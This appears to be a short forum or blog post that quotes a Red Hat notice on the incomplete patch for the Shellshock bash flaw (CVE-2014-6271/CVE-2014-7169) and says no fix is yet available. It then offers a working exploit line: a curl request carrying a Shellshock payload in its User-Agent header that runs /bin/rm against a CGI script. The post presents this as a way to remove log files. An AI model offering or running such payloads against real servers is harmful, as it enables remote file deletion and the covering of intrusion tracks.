RedHat customer portal
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
This issue (CVE 2014-6271) has not been resolved on RedHat Operating systems (i.e. no patch yet)
Once finding a cgi script (poc.cgi) you can remove the log files with this:
curl –A “() { :; }; /bin/rm /var/www/target” http://192.168.0.1/poc.cgi